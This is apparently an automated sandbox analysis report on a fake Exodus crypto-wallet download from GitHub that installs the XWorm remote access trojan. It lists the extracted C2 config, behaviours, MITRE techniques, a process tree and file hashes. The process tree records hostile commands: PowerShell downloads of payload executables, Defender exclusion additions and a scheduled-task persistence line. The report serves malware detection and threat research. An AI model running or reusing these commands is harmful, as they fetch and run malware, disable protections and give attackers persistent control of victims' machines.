xworm | hxxps://github[.]com/ek4o/fake-exodus/releases/tag/ekoTools

Analysis

max time kernel
117s
max time network
117s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
06/03/2025, 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ek4o/fake-exodus/releases/tag/ekoTools

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5452-274-0x00000000022B0000-0x00000000022BE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
37	4212	powershell.exe
38	4212	powershell.exe
39	5024	powershell.exe
40	5024	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5252	powershell.exe
4184	powershell.exe
4212	powershell.exe
5024	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 4 IoCs

pid	Process
4552	ExodusInject.exe
3608	Exodus.exe
5452	AggregatorHost.exe
5956	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
24	raw.githubusercontent.com
38	raw.githubusercontent.com
40	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5544	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\ExodusWallet.zip:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2684	msedge.exe
2684	msedge.exe
3920	msedge.exe
3920	msedge.exe
2688	msedge.exe
2688	msedge.exe
2184	identity_helper.exe
2184	identity_helper.exe
112	msedge.exe
112	msedge.exe
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
5024	powershell.exe
5024	powershell.exe
5024	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
5252	powershell.exe
5252	powershell.exe
5252	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	4552	ExodusInject.exe
Token: SeBackupPrivilege	2008	vssvc.exe
Token: SeRestorePrivilege	2008	vssvc.exe
Token: SeAuditPrivilege	2008	vssvc.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	5252	powershell.exe
Token: SeDebugPrivilege	5452	AggregatorHost.exe
Token: SeDebugPrivilege	5452	AggregatorHost.exe
Token: 33	5904	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5904	AUDIODG.EXE
Token: SeDebugPrivilege	5956	System.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe
3920	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 2672	3920	msedge.exe	82
PID 3920 wrote to memory of 2672	3920	msedge.exe	82
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 1388	3920	msedge.exe	83
PID 3920 wrote to memory of 2684	3920	msedge.exe	84
PID 3920 wrote to memory of 2684	3920	msedge.exe	84
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85
PID 3920 wrote to memory of 3376	3920	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/ek4o/fake-exodus/releases/tag/ekoTools
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff981f03cb8,0x7ff981f03cc8,0x7ff981f03cd8
  2⤵
  PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
  2⤵
  PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:2516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4076 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,16395089517074555964,9079227598280760372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1148

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4968

C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2260
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2371.tmp\2372.tmp\2373.bat C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
  2⤵
  PID:2028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- - C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe
    "C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp485E.tmp.bat""
      4⤵
      PID:5492
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5544
- - C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe
    "C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:3608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5452
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5652

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5904

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e8baaf6c583536c9e6327e9d4fddb4cc

SHA1
0c1436d1a870038a6cb0195704658ef59ef78906

SHA256
7cea1717ca57c727378be31a2046e1b4be05ceaff81e76d45b5b3fb1a0b09507

SHA512
6cdb5d74ebf3c2f398c2032e6047f32b342db6f28f997c9c3df2351e307b316a6d66127a3ba6f0b1a721e5afd50a5578ec9835ea25708fcd49850ec4ba64dd67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5332d65d7c50eee952b71eda55782f27

SHA1
9039a05b96d6f5fc532a4ddb304ec01aa2fe5879

SHA256
b677f0eeb2f0c049f48cc35d484ead2ba5434a74e4264e64d7f426fe45f2ff0e

SHA512
eeff99092be3b0bcf81e9ba0f2a72d592938ef90952e533f903707d1e0af2138db62a4b491476f499a0909bf52fc7aada7aa832c73aa882d40f488afe5b29b27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
38c6e52cab3565f9d6ddcda283ef65a0

SHA1
82195c1c5dc4a965cadc8d3464011496c649e9ce

SHA256
9099e8d3374d3c258420c5adfabe23b679d36a0a85cf6a04ccdaf7b8e164522e

SHA512
55b05275923fafd0f5b06e5b88a79a7203a1927247347813318ca20b124f4cf2561a1df7ef7a6b42c2ddef099c2dd3061d3eca212a4cde35ecc5dc5efe62d19c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
595B

MD5
080454668df489ad8d7fb4863bc2a4f5

SHA1
d958ad060c205763625812f37e6718fc2a448c6f

SHA256
17231fe0604d3325dfb72c2a1476f9b36b3b14487b04046c8581ba9ecc0b9c8f

SHA512
a0d8d88aa2a27bf0e5efc1485133749375c31844b87d00dd87b92d60d660c85d7e550b935927aec0ecd23fde66e7dbd4da2cc14a8858c395073b808ab300e8f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c16f61de92348076c6958ffbad1d7db0

SHA1
46e1bd4ffd27746752d1f22bfc1bd498ce6ed4b3

SHA256
9f79eb6d622d528f34316ca0f2251f06894f1e5791d33c4803e80e7e4cbab060

SHA512
fce1569ec9e2426104659add14b2bb44c80f86a7907796d353df0fcbf42f004c20c18ba77a6c76c3609a62eec577ae2e01950559efb766e7b33d6fb1eb8e13b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c9ec55f14b8743927dd2fa1a5659a953

SHA1
777bdb21d299d823824349bc36836619b3cae6b5

SHA256
af171f173e29f1c7e3d66e45aa3aa10c6504b991599a1594dd8ac0bc2ef420a8

SHA512
95ef23b2bfc4aa813d2fb0f967976daef51be433980f12a1eaf500fb30bf9423668ebfb27f7e605b7d6832bdbb1422f193cd4bdc1ab5b22f660f788adbe1b463

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ced7bbc22387ec98a2a919df2c5fa6b5

SHA1
3d38f0a7ad6ffb5f0fcae0024ba592cb3bb2a681

SHA256
8a3ab31cac179d2ce184e1a2e06636123f9363e3b75531f7fc364607b5ae3754

SHA512
e0051e31f88c837075ce153f732080a575e372ebfd80b60215a4c59385ddd95b09960c4d9e185d232182778a83325a056566b96bdb3920371875828c65c1c68e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6555dd7058d959ab5386ebc2ff9d1376

SHA1
8ca31135fc3b335975aa1d5428ef6eef47456024

SHA256
61b10583b2773bd2dd48d91be8ee95e9320982fbdea60f3a04a771e1865fa155

SHA512
cf01afecd300041bf4d32e13a577aff54dc39a0bdd044af929dcdb474651e7bf2f133c9c65a41bd25f6475c88dc215f33b72e6f64f4e3825e57274ad8a8f8d57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e6baeec02c3d93dce26652e7acebc90

SHA1
937a7b4a0d42ea56e21a1a00447d899a2aca3c28

SHA256
137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

SHA512
461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ba8d03d9d09f8ab05ef694dea36596d

SHA1
0bb07da9d44b03720127ed9fb46d7de7454fdb79

SHA256
ee27d919a2a29e00b65110e779c83803b2d2f9d79fef103729c8ac46cc1f6711

SHA512
dfd2299c7950c69a8ed1fef842dd73f8818ba0632e22d34da50a6e531fd7719ef4076a3674c219881255401f4172b5746c7abc206d16206e3960a70b30673f22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
76750f7f07cf1179dc12eaca195b04d3

SHA1
a3f7810796b486dbbc85b70f9f41d318afa54363

SHA256
d0fff09010a07f157a3f5eaf17c1cbc46e17a9a676ff485e8a194618b8fee7a4

SHA512
